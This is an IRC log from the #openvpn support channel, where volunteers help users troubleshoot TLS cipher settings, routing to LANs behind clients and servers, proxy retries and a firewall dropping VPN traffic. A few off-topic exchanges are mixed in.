on, no = forced off, adaptive = sample compression performance and turn on/off when data is compressable 11:47 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 255 seconds] 11:48 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 11:48 < matsh> Are there any reasons why I should not set it to 'yes'? 11:50 < pekster> I wouldn't use lzo when you're talking low-CPU like embedded hardware 11:50 < matsh> It's weird that the dd-wrt keeps enabling it then. 11:51 < matsh> pekster: However, got any idea why the tls doesn't play good? 11:52 < pekster> Do both sides support the TLS cipher-suite the client is hard-coded to require? ie: server shows that in its output for 'openvpn --show-tls' ? 11:53 < pekster> I believe when omitted it accepts anything, although you might want to retry matching that value on both peers 11:53 < jtrimmer> Hello everyone. I have a Windows OpenVPN Server inside our company subnet. I have clients connecting through our company firewall to a machine running openVPN setup in a TUN configuration. Now the server and the client can see each others subnets and talk back and forth. Everything seems to be working 100% on that aspect. But what I would like to do is also route traffic from all of the 11:53 < jtrimmer> other machines in the office to my clients local subnet aswell. I setup a route on the company firewall to redirect traffic to the openVPN server IP but that is where everything fails. Can this even be done or am I living in a pipe dream? 11:54 < pekster> jtrimmer: You have a LAN behind the VPN client? 11:55 < matsh> pekster: The server supports it of course, I'm gonna have it checked on the router. If not, just set cipher global to anything they all support? 11:55 < jtrimmer> the vpn client is a Tomato Router 11:55 < pekster> jtrimmer: This may be useful for getting client LAN functioning: 11:55 < pekster> !clientlan 11:55 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled (!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route 11:55 <@vpnHelper> for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png 11:57 < pekster> matsh: I'm suggesting you match the 'tls-cipher' values between hosts. I believe it is "supposed" to work, but it's very non-standard to define cipher, auth, and tls-cipher directives on one side but not the other, even if you're specifying what should be the defaults 11:58 < pekster> Try "tls-cipher DHE-RSA-AES256-SHA" on the server and bounce the instance to see if anything changes 11:58 < matsh> Yeah I know, so I'm thinking there is a reason why dd-wrt keeps setting some values on it's own. 11:58 < jtrimmer> !route_outside_openvpn 11:58 <@vpnHelper> "route_outside_openvpn" is (#1) If your server is not the default gateway for the LAN, you will need to add routes to your gateway. See ROUTES TO ADD OUTSIDE OPENVPN in !route or (#2) Here are 2 diagrams that explain how this works: http://www.secure-computing.net/wiki/index.php/Graph http://i.imgur.com/BM9r1.png 11:58 < pekster> It could just be explicitly declaring them; I tend to do that in my configs too, but both sides of my connection match values 11:58 -!- mezgani_ [~mezgani@41.250.233.240] has left #openvpn ["Leaving"] 11:59 < matsh> Well, I know the server uses that cipher, because when the client only had AES256-SHA there was an explaining error, hence the change to DHE-RSA-AES256-SHA. 11:59 -!- p3rror [~mezgani@41.250.233.240] has joined #openvpn 11:59 < matsh> But I might be better off setting them manually to be sure. 12:00 < pekster> matsh: Posting full logs at 'verb 4' is a better way to troubleshoot this as it includes the full output of all the settings whwen the instance starts 12:01 -!- MeanderingCode [~Meanderin@71-213-170-8.albq.qwest.net] has joined #openvpn 12:01 < matsh> Ah, thanks. I didn't know 12:03 -!- Erawan_RN [~Erawan@unaffiliated/erawanarifnugroh] has quit [Ping timeout: 245 seconds] 12:03 < pekster> fwiw, my 2.3.0 installation works fine with that tls-cipher value on one side but not defined on the other 12:04 -!- Erawan_R` [~Erawan@www.erawan.me] has joined #openvpn 12:04 < pekster> That's the expected behaviour, although I'd encourage you to match the value if you choose to limit ciphers like that. There's a small advantage to doing it only on the server-side (in that you can change it centrally) but doing it only on the client side seems odd to me 12:06 -!- krad [~m@unaffiliated/krad] has joined #openvpn 12:06 < matsh> Yeah, I've never done it, but dd-wrt seems to have a will of it's own 12:07 < pekster> This is why I trashed the OpenWRT initscript for OpenVPN and just wrote my own to use standard config files 12:08 < pekster> I hate systems that hide operation of services I want to manually run behind layers of buttons and distro-level knobs 12:09 < matsh> Agreed. 12:11 < pekster> Unless you're using --tls-auth on one side but not the other (via some implicit CLI argument your init does) I don't think you should be getting decryption issues with the posted config 12:11 < matsh> I believe the dd-wrt as specified ^auth 12:13 < pekster> verb 4 tells you everything you need to know. Compare output of values between peers for problems with critical things like tls-auth, auth, cipher, keysize, etc 12:13 < matsh> There is no 'tls-cipher' on the server log, should it be set manually then? 12:14 < matsh> And, is there a 'tls-auth' -and- 'auth'? 12:14 < jtrimmer> I think the flow charts are missing a section for my problem. I want to go from an ip on the same subnet as the server to a clients ip address. The server itself can talk to the clients and the clients can talk to all of the ips on the servers subnet just fine. Just not sure what to do when the server is a standalone machine and not the router for the entire subnet. 12:15 < krad> i see alot of talking in here, this is not a good metric for the channel. 12:16 < matsh> Maybe we should cycle in between the talking once in a while. 12:17 < pekster> jtrimmer: To the VPN client itself, or a PC on a LAN behind a VPN client? 12:19 < pekster> matsh: I'm talking about the output in your logs from 'verb 4' - that prints *every* config value, even if it's not defined in your config file or on the CLI 12:19 < matsh> pekster: Yeah I know, and it doesn't mention tls-cipher 12:21 < pekster> Ugh, trying to find the right value for you, and apparently 2.3.0 no longer does the expected output on windows at 'verb 4' :( 12:21 * pekster files that away to look into the source for later 12:21 < matsh> It says something about 'Control Channel: TLSv1, cipher TLSv1/SSLv3 DHE-RSA-AES256-SHA, 1024 bit RSA' to the client that has successfully connected. 12:22 < pekster> Oh, that's good. This is before it complains about decryption? 12:24 < matsh> That is to a client that has successfully connected 12:25 < pekster> Gotta be something stupid your 2nd client is doing then. Try 'ps' or such on the other client to see if it's adding CLI params that break it 12:26 < pekster> Or a comp-lzo mis-match if that really does impact portions of the TLS channel (I'm not 100% sure that it's data-channel only without digging in the code to back that statement up) 12:27 < matsh> Yeah, it's not mine. The guy with the dd-wrt left for a bit, so I guess we'll have to try with the same tls and auth options specified later. 12:29 < pekster> That shouldn't make a difference (if you just set that on the server too) at least not based on my test with 2.3.0 12:29 < pekster> My guess is the client is doing something weird not shown in the config you posted 12:29 < matsh> Might be, I'll try and fetch a complete verb 4 output from him. 12:29 < pekster> jtrimmer: If you have LANs behind both your VPN client and server, you need to set both the !clientlan and !serverlan stuff up 12:33 < jtrimmer> !serverlan 12:33 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png 12:36 < jtrimmer> !route 12:36 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide 12:41 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 12:41 -!- mode/#openvpn [+o krzee] by ChanServ 12:41 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Remote host closed the connection] 12:42 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 12:42 -!- mode/#openvpn [+o krzee] by ChanServ 12:51 -!- AndrewX192 [~andrew@unaffiliated/andrewx192] has joined #openvpn 12:51 -!- alaa [~alaa@41.36.146.1] has quit [Quit: Leaving] 12:51 < AndrewX192> What's the difference between tls-server and tls-auth direction? 12:52 <@krzee> !man 12:52 <@vpnHelper> "man" is (#1) For man pages, see http://openvpn.net/index.php/open-source/documentation/manuals/ or (#2) the man pages are your friend! 12:53 < pekster> tls-server sets the peer to act as a server during the TLS-handshake (which has explicitly requirements for being a "server" verses a "client.") tls-auth direction is an arbitrary value that must either be omitted, or be opposite between peers 12:53 < pekster> And yes, that should be explained nicely in the manpages too :) 12:54 -!- jtrimmer [~jtrimmer@75-151-66-133-WestFlorida.hfc.comcastbusiness.net] has quit [] 12:59 < AndrewX192> I was looking in the man page, I just didn't see anything in reference to tls-auth direction in the man page, and it turned out I needed to scroll up to before --tls-server directive in the man page to see "TLS Mode Options" 13:01 < pekster> Oh, yea. There is no "direction" to --tls-auth (that's an allowable list of asymettric cipher-suites to allow from the supported choices) 13:02 < pekster> Same as in https, the server send an acceptable list of choices, and the client picks one 13:02 < pekster> To prevent downgrade attacks, hardened setups should limitt his to a sane and secure subset 13:05 < pekster> I actually had that backwards: the client (initiating system) sends the suggested ciphersuite list 13:17 <@dazo> uhm 13:17 <@dazo> that sounds wrong 13:18 <@dazo> --tls-auth is adding additional HMAC data to the OpenVPN data (TLS packets) ... which is a way to authenticate the TLS packets 13:18 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 255 seconds] 13:19 <@dazo> if the TLS packet has been modified (think MITM attacks), the HMAC will not correspond - and the openvpn server or client can just drop the packet before even trying to decrypt it 13:20 <@dazo> the 'direction' flag is to indicate to openvpn which key-pair to use ... as the shared 'secret' (generated by openvpn --genkey) contains data for several keys ... so each side uses one key for signing packets, and the other key to verify packets from the remote side 13:21 <@dazo> which makes it even harder to intercept an on-going openvpn connection 13:22 < pekster> Erm, --tls-cipher 13:22 < pekster> Yea, it was an issue confusing the operation of those 2 params 13:22 <@dazo> --tls-cipher is something completely different :) 13:23 < pekster> Right. The original question was about the difference between them, and I just transposed one value when describing another. Not doing a great job for clarifying the distinction, 'eh? :\ 13:23 <@dazo> --tls-server and --tls-client is to enable the PKI mode of openvpn ... which implicitly means, the multi-peer-to-peer mode (--server / --mode server) 13:23 < EugeneKay> --tls-bacon 13:23 < EugeneKay> Best option ever. 13:23 <@dazo> EugeneKay: that only makes it smelly! 13:24 <@dazo> makes the CPU work too hard 13:25 -!- MeanderingCode [~Meanderin@71-213-170-8.albq.qwest.net] has quit [Read error: Connection reset by peer] 13:26 < EugeneKay> Yeah, but if you install a grease-powered generator you can run the server for pennies 13:26 < pekster> cd openvpn; ./configure --with-grease-power 13:27 -!- cmelbye [~charlie@yourwiki/staff/charlie] has quit [Read error: Connection reset by peer] 13:28 < pekster> I seem to recall seeing some source comment in 2.3.0 about verb 4 silently not printing the param listing, but I'm not finding that now. Am I just missing that? If it's intentional, the --help output on Windows sure doesn't suggest that behaviour 13:30 <@dazo> pekster: we have not changed anything in regards to --verb and config dumping .... it comes on --verb 4 but not 3 13:32 < pekster> I'm not getting it on a 2.3.0 install of the 64-bit I004 build (I believe it acted this way in earlier builds too.) Run from the command-line, so no funny GUI-wrapper involved 13:34 < pekster> even nothing at verb 6... 13:34 < pekster> http://dpaste.org/p5tbO/ 13:39 <@dazo> pekster: oh, if it's built with --enable-small ... then it might not add that 13:40 <@dazo> openvpn --version ... what does it say? 13:40 < pekster> Yea, or the ENABLE_DEBUG def in options.c 13:40 < pekster> Sure enough, enable_debug=no 13:41 <@dazo> yeah ... I think --enable-small implies disabling ENABLE_DEBUG 13:42 < pekster> Yup. line 884 on options.c: http://fpaste.org/7Cmv/ 13:42 < pekster> Should I open a ticket? That breaks the printed help output shown for --verb when you do 'openvpn --help' under Widnows 13:42 < pekster> It's a build issue, not a code issue 13:43 < pekster> (too bad I didn't look into that before the I004 build went live. Oh well) 13:43 -!- vraa__ [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 13:45 < pekster> enable_small=no, fwiw. Just missing the enable_debug 13:45 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 13:45 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 13:45 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 13:45 -!- mode/#openvpn [+o krzee] by ChanServ 13:46 < pekster> full output: http://dpaste.org/0O9WO/ 13:46 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 252 seconds] 13:48 < pekster> I guess the other solution is make that part of the code not rely on ENABLE_DEBUG and include it even without --with-debug. The ./configure output suggests it's specifically for verb 7+ stuff 13:49 < pekster> Either rip out the #ifdef, or give it a separate build-time option, like ENABLE_SHOW_PARM or such 13:51 < pekster> I'll hit -devel@ with the details and options. Either official builds should contain --enable-debug or options.c should be changed 13:55 < krad> don't get too much excited 13:56 -!- Varazir_ [~mircwars@c-94-255-130-138.cust.bredband2.com] has joined #openvpn 13:58 -!- Varazir [~mircwars@c-94-255-128-179.cust.bredband2.com] has quit [Ping timeout: 252 seconds] 14:00 -!- dazo is now known as dazo_afk 14:06 -!- Varazir_ is now known as Varazir 14:14 -!- axelm7 [~axelm7@200-127-146-90.net.prima.net.ar] has joined #openvpn 14:15 < axelm7> hi guys, which is the correct VPN client for a Windows 7 machine where my user is not administrator and he does not hve permissions to change the routes? 14:15 < axelm7> can I use the AS client that runs as a service? 14:16 < pekster> Changing routes requires administrator access by the process performing the operation, or the correct set of deligated OS priveleges to do so 14:16 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds] 14:17 < pekster> I've no clue how AS does things (#openvpn-as is the place to ask about the AS product as here is for the OpenVPN project specifically) 14:18 -!- magic_1 [~magic@unaffiliated/magic1/x-836121] has joined #openvpn 14:19 < pekster> This may be of use too: http://www.openvpn.se/files/howto/openvpn-howto_run_openvpn_as_nonadmin 14:19 <@vpnHelper> Title: HowTo Run OpenVPN as a non-admin user in Windows (at www.openvpn.se) 14:19 < magic_1> anyone know what would be cause the tls auth from timing out 14:19 < pekster> Creative use of the service method with the management interface could probably allow encrypted passwords and service-level control by a fully non-admin user 14:21 < magic_1> well key negotiations to fail 14:22 < magic_1> ive opened the port on the firewall but im just not getting through 14:22 < pekster> magic_1, a variety of things cause TLS handshake timeouts, ranging from network problems to the remote host having dropping the traffic if it fails to pass one of the security checks. What logs on the remote host do you get during a connection attempt? 14:23 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 14:24 < magic_1> was thinking that as well pekster, however inside the firewall it connects just fine, thats whats confusing me 14:25 < pekster> Sounds like a network issue then. tcpdump and careful evaluation of your firewall rules should help determine where traffic is (or is not) going 14:25 < magic_1> i am at my wits end 14:26 < magic_1> will be doing that again 14:27 -!- dbhaber [me@208.99.80.128] has joined #openvpn 14:27 < dbhaber> yolo 14:34 -!- julius__ [~julius@p3EE2AB4F.dip.t-dialin.net] has joined #openvpn 14:34 < julius__> hi 14:34 < dbhaber> hi 14:34 * dbhaber pokes ecrist 14:35 < julius__> ive got a openvpn server running which accepts multiple clients. ive read "Including multiple machines on the client side when using a routed VPN" in the howto. does this mean that machines behind the client will communicate directly without sending all communications over the server? 14:35 <@ecrist> dbhaber: wtf is up man? 14:36 < dbhaber> ecrist: is that a good wtf 14:36 <@ecrist> got your PM, didn't bother replying on the forum, btw 14:36 < dbhaber> or a bad one 14:36 <@ecrist> yes 14:36 <@ecrist> good 14:36 < pekster> julius__: No, all communication is routed via the server in a setup like that 14:36 < dbhaber> ecrist: same old same old really 14:36 < dbhaber> this tapatalk business actually makes it very easy for me to be active once again 14:36 < julius__> for example, my server is on a rather low bandwitdh but machines behind the client could use a 100mbit network if they need to exchange data 14:37 < julius__> pekster, is there no way to have machines in one lan recognize that their communication peer is closer in the current lan than over the openvpn server? 14:37 < pekster> julius__: Run a point-to-point VPN between the clients and route across that then 14:37 < julius__> i will look that up 14:37 < pekster> If you add a route to reach $other_client_lan via the VPN server, routing sends it via the VPN server 14:38 < dbhaber> ecrist: i know this is years old already but how is your wife 14:38 < dbhaber> i still remember hearing she got hurt 14:39 < pekster> You'd need separate tunnels if you wanted two peers to directly exchange information with each other. That doesn't work if, for example, both clients are behind NAT you don't control and can only reach your server via outbound connections 14:40 <@ecrist> dbhaber: she's fine now. only long-lasting problem is her olfactory nerve was severed, so she can't smell anything any more 14:40 < dbhaber> that really sucks 14:41 < dbhaber> i wouldnt like life as much.. but then again, as an EMT, if there were things I could never smell again, totally cool with me 14:41 -!- medum_ [kevin@n2l.org] has quit [Remote host closed the connection] 14:41 < dbhaber> how are things in MN? 14:41 < pekster> Bloody cold... 14:41 < dbhaber> lol 14:48 <@ecrist> they are, really 14:48 <@ecrist> pekster: you live around here somewhere, don't you? 14:49 * ecrist knows someone in here does 14:49 < dbhaber> ecrist: still running a datacenter out of the basement? luls 14:49 <@ecrist> dbhaber: no 14:49 < krad> haber is ignoring me 14:49 < dbhaber> no more racks? 14:49 <@ecrist> nope 14:49 < dbhaber> how come 14:49 < dbhaber> krad: frankly, you're just creepy 14:49 < krad> what is creepy 14:49 < pekster> ecrist: Yup, south of the river from St Paul 14:50 <@ecrist> CG, myself 14:50 < krad> dbhaber, 1. Informal having or causing a sensation of repulsion, horror, or fear, as of creatures crawling on the skin 14:51 < krad> dbhaber, did you mean that 14:51 <@ecrist> dbhaber: I colo all my boxes, or have VMs now 14:51 < magic_1> lol 14:51 < krad> haber and i share the same family name, yet he's being mean to me 14:52 < krad> we are in different continents as well 14:52 < magic_1> oooo 14:52 < krad> and we just met! 14:53 * krad will disfamily dbhaber 14:53 < krad> hi db 14:56 < dbhaber> ecrist: ahh. where do you colo now 14:56 < dbhaber> I am down to one server at DedicatedNOW now that I colo, and i still have my brocolo in MD 14:59 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 248 seconds] 15:05 < dbhaber> ecrist: i will try to show my face around the forums a bit more now and deal with some of the idiots 15:05 -!- jtrimmer [~jtrimmer@75-151-66-133-WestFlorida.hfc.comcastbusiness.net] has joined #openvpn 15:05 < dbhaber> and silly questions 15:05 < krad> lol 15:07 -!- krad [~m@unaffiliated/krad] has quit [] 15:09 < jtrimmer> I feel like I'm playing whack-a-mole with openVPN. I get one thing working then another breaks. 15:09 <@ecrist> dbhaber: I use RootBSD 15:11 < dbhaber> never heard of, at least not much 15:11 < dbhaber> jtrimmer: lawl 15:11 < dbhaber> well hopefully you are getting a high score 15:11 -!- magic_1 [~magic@unaffiliated/magic1/x-836121] has quit [] 15:12 < jtrimmer> no the moles are laughing at me 15:13 -!- Erawan_R` [~Erawan@www.erawan.me] has quit [Read error: Connection reset by peer] 15:13 -!- Erawan_Ra [~Erawan@at.erawan.me] has joined #openvpn 15:13 < dbhaber> :( 15:14 -!- p3rror [~mezgani@41.250.233.240] has quit [Read error: Connection reset by peer] 15:14 -!- p3rror [~mezgani@41.249.144.158] has joined #openvpn 15:15 < jtrimmer> now the server and the machines on the server side can talk to the clients and their lans but the clients and their lans cannot ping the server machines. It is annoying. 15:16 -!- Voss [~Voss@unaffiliated/dionysus] has left #openvpn [] 15:16 -!- axelm7 [~axelm7@200-127-146-90.net.prima.net.ar] has quit [Ping timeout: 276 seconds] 15:18 < pekster> jtrimmer: If you can ping one direction but not the other, you likely have a firewall problem. NAT is also a possability if you're performing SNAT when you intend to be doing full routing instead 15:19 -!- julius__ [~julius@p3EE2AB4F.dip.t-dialin.net] has quit [Quit: Leaving] 15:19 < pekster> tcpdump and friends will help; just step through each hop the packet takes 15:19 < jtrimmer> it shouldn't be a firewall as I have all of the firewalls shut off. I'm pretty sure it is nat but I'm scratching my head not seeing the problem. 15:20 < dbhaber> hmm is the bot still here 15:20 < dbhaber> !logs 15:20 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 15:20 < pekster> logs aren't relevant if a ping works; it's not a connection issue, or even a routing issue if a system on one side of the VPN server can ping a system behind a VPN client 15:22 < pekster> jtrimmer: Don't make assumptions about firewalls. You have at least 4 systems involved, and more if the VPN client/server isn't the default gateway on their respective LANs. That's up to 6 systems right there, and more if the backend LANs are more complex 15:22 < jtrimmer> the client is the default gateway the server is not 15:23 < pekster> So you have no fewer than 5 systems involved in VPN transport path 15:23 < jtrimmer> I have wireshark running on the server right now. I see the request go out but never see a reply come back. 15:24 < pekster> Go out where, to the server-side LAN? 15:24 < jtrimmer> I have a static route setup on the gateway on the server side to send all client traffic back to the server machine as the gateway. 15:24 < pekster> Is your target replying to the ping? 15:24 < pekster> dump traffic there 15:25 < pekster> It's either that or the LAN gw dropping/not-responding to the traffic 15:25 < jtrimmer> duh I should of thought of that 15:26 < pekster> When I said "don't amke assumptions about firewalls" I meant that quite literally 15:29 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 15:32 < jtrimmer> The sonicwall is dropping the packets. Weird though because when I ping from a machine on the server side the sonicwall passes them on just fine. 15:33 < pekster> Not weird at all. My IPv6 border firewall does the same thing: it allows unsolicited traffic in only 1 direction 15:34 < pekster> Maybe not what you want/expected, but then you need to fix it 15:35 < jtrimmer> well yeah it is dropping all packets coming from the client side I have to fix it. 15:37 < jtrimmer> it is calling them ip spoofs and dropping out the packets 15:40 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has quit [Quit: Leaving] 15:43 -!- jtrimmer [~jtrimmer@75-151-66-133-WestFlorida.hfc.comcastbusiness.net] has quit [Read error: Connection reset by peer] 15:44 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 15:48 -!- jtrimmer [~jtrimmer@75-151-66-133-WestFlorida.hfc.comcastbusiness.net] has joined #openvpn 15:49 < jtrimmer> whoops changed the wrong setting. Took down the internet for a minute 15:50 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has joined #openvpn 15:51 < pekster> ecrist: You don't indoor rock climb by chance, do ya? 15:53 -!- KaiForce [~chatzilla@adsl-70-228-64-42.dsl.akrnoh.ameritech.net] has quit [Quit: ChatZilla 0.9.90 [Firefox 18.0.2/20130201065344]] 16:05 < dbhaber> snooze 16:08 -!- gedO [~quassel@client-178-16-35-81.inturbo.lt] has quit [Remote host closed the connection] 16:11 -!- xtreme_ [~wtf@193.28.228.85] has joined #openvpn 16:12 -!- discojoe [~wtf@193.28.228.85] has quit [Ping timeout: 255 seconds] 16:13 -!- Shadowized [~Shadowize@st0p.trying.to.trac3.me] has quit [Ping timeout: 264 seconds] 16:14 < jtrimmer> pekster: thank you for the help. I finally got it working. Sometimes it helps to have someone elses head to use. 16:15 -!- mete [~mete@mete.shell.la] has quit [Ping timeout: 248 seconds] 16:18 -!- Shadowized [~Shadowize@st0p.trying.to.trac3.me] has joined #openvpn 16:18 -!- mete [~mete@mete.shell.la] has joined #openvpn 16:20 < KiNgMaR> I'm having OpenVPN connect through an HTTP proxy. sometimes, this happens: openvpn[32336]: HTTP proxy returned: 'HTTP/1.0 503 Service Unavailable' and OpenVPN shuts down (SIGTERM[soft,init_instance] received, process exiting). is there an option to make it keep retrying? 16:23 < pekster> KiNgMaR, are you using (or pushing from the server) --keepalive, or the --ping + --ping-restart options? 16:25 < KiNgMaR> pekster: no, I don't. I found http-proxy-retry now, though, maybe that'll help :-) 16:25 < pekster> Ah, okay. I guess it has its own mechanism for that (I don't need to deal with openvpn over http proxies, thankfully) 16:26 < KiNgMaR> apart from that, it's working very well :-) 16:29 -!- jtrimmer [~jtrimmer@75-151-66-133-WestFlorida.hfc.comcastbusiness.net] has quit [] 16:37 -!- Orbi [~opera@109.129.21.144] has joined #openvpn 16:39 -!- Orbi [~opera@109.129.21.144] has quit [Read error: Connection reset by peer] 16:39 -!- Orbi [~opera@109.129.21.144] has joined #openvpn 16:39 -!- Orbi [~opera@109.129.21.144] has left #openvpn [] 16:39 -!- exitnode [~androirc@HSI-KBW-149-172-26-60.hsi13.kabel-badenwuerttemberg.de] has joined #openvpn 16:40 -!- Teck7 [~teck7@76.65.60.225] has joined #openvpn 16:42 -!- p3rror [~mezgani@41.249.144.158] has quit [Read error: Connection reset by peer] 16:42 -!- rfxn [~teck7@69.157.152.252] has quit [Ping timeout: 245 seconds] 16:44 -!- exitnode [~androirc@HSI-KBW-149-172-26-60.hsi13.kabel-badenwuerttemberg.de] has quit [Quit: AndroIRC - Android IRC Client ( http://www.androirc.com )] 16:59 -!- dbhaber_ [me@208.99.80.128] has joined #openvpn 17:00 -!- dbhaber [me@208.99.80.128] has quit [Read error: Connection reset by peer] 17:01 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 256 seconds] 17:01 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has quit [Ping timeout: 256 seconds] 17:01 -!- gladiatr [~sdspence@24.124.15.166] has joined #openvpn 17:01 -!- gladiatr [~sdspence@24.124.15.166] has quit [Changing host] 17:01 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has joined #openvpn 17:01 -!- krphop [~krphop@watch.out.the.feds.are.rightbehind.us] has quit [Ping timeout: 256 seconds] 17:02 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 17:03 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 17:03 -!- krphop [~krphop@watch.out.the.feds.are.rightbehind.us] has joined #openvpn 17:18 -!- vraa__ [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 264 seconds] 17:27 -!- p3rror [~mezgani@41.249.144.158] has joined #openvpn 17:33 -!- mikkel [~mikkel@80.71.132.15] has quit [Quit: Leaving] 17:35 -!- KaiForce [~chatzilla@adsl-70-228-64-42.dsl.akrnoh.ameritech.net] has joined #openvpn 17:38 < KaiForce> has a fix been identified for the problem described here; https://forums.openvpn.net/topic11901.html 17:38 <@vpnHelper> Title: OpenVPN Support Forum OpenVPN crash windows8 x64 - 2.3 build : Testing branch (at forums.openvpn.net) 17:43 -!- plut0 [~cory@pool-96-236-43-69.albyny.fios.verizon.net] has joined #openvpn 17:43 -!- eres [~rs@onyon.net] has quit [Ping timeout: 276 seconds] 17:45 < plut0> is there a fix to the ntlm authentication issue for proxies in the latest version? https://forums.openvpn.net/topic7945-15.html 17:45 <@vpnHelper> Title: OpenVPN Support Forum OpenVPN client behind ISA ( Forefront TMG ) : Configuration - Page 2 (at forums.openvpn.net) 17:46 < plut0> getting this when trying to connect, "received corrupted data from proxy server" 17:48 -!- baobeiiii [~baobeiiii@192.73.244.224] has joined #openvpn 17:48 < baobeiiii> morning/night 17:49 -!- eres [~rs@onyon.net] has joined #openvpn 17:54 -!- baobeiiii [~baobeiiii@192.73.244.224] has quit [Read error: Connection reset by peer] 17:56 -!- baobeiiii [~baobeiiii@192.73.244.224] has joined #openvpn 17:59 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 18:06 -!- p3rror [~mezgani@41.249.144.158] has quit [Ping timeout: 248 seconds] 18:06 -!- baobeiiii_ [~baobeiiii@192.73.244.224] has joined #openvpn 18:10 -!- baobeiiii [~baobeiiii@192.73.244.224] has quit [Ping timeout: 240 seconds] 18:17 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 18:20 < dbhaber_> hm 18:26 -!- defswork [~andy@141.0.50.105] has quit [Ping timeout: 244 seconds] 18:26 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds] 18:27 -!- gardar [~gardar@gardar.net] has quit [Quit: bye!] 18:28 -!- gardar [~gardar@gardar.net] has joined #openvpn 18:37 -!- brute11k [~brute11k@89.249.230.159] has quit [Ping timeout: 264 seconds] 18:38 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 18:38 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 248 seconds] 18:39 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 255 seconds] 18:39 -!- defswork [~andy@141.0.50.105] has joined #openvpn 18:48 -!- jaws [~root@5.231.5.192] has joined #openvpn 18:54 < plut0> anyone? 18:58 < jaws> yea 18:59 < plut0> getting this when trying to connect, "received corrupted data from proxy server" 19:01 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has joined #openvpn 19:06 -!- zach [~zach@nat-192-95-29-123.bhs1.montreal.qbc.ca.nuked.co] has joined #openvpn 19:07 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has quit [Remote host closed the connection] 19:08 < zach> Good day gents and ladies. I'm looking for some insight on if my idea is possible -- I have two clients - one server, is it possible to route other subnets behind the clients to, well - other clients? ie: client1 - 10.0.5.0/24 is where they're connecting from, client2 is in 10.10.10.0/24 -- what I would like to do is make it so both sides (client 1 & client 2) can see other addresses within the respected subnets. 19:17 <@ecrist> yes 19:17 <@ecrist> !route 19:17 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide 19:17 <@ecrist> !iroute 19:17 <@vpnHelper> "iroute" is does not bypass or alter the kernel's routing table, it allows openvpn to know it should handle the routing when the kernel points to it but the network is not one that openvpn knows about. This is only needed when connecting a LAN which is behind a client, and therefor belongs in a ccd entry. Also see !route and !ccd 19:17 <@ecrist> read up, this isn't networking 101 19:17 <@ecrist> if you run into a genuine issue, feel free to ask, though. :) 19:19 < zach> haha, yeah - I thought that was the way I just wanted to confirm, was already going down that road 19:19 <@ecrist> excellent 19:19 < zach> writing out my default routes, just wanted to confirm I was going about it in the right way 19:19 <@ecrist> what you're trying to do is very common 19:19 -!- novaflash [~novaflash@openvpn/corp/support/novaflash] has quit [Ping timeout: 245 seconds] 19:19 < zach> I have ~15 routes on one side (client 1) that need to be accessible via client 2, so it's just a lot of typing of routes 19:20 -!- novaflash 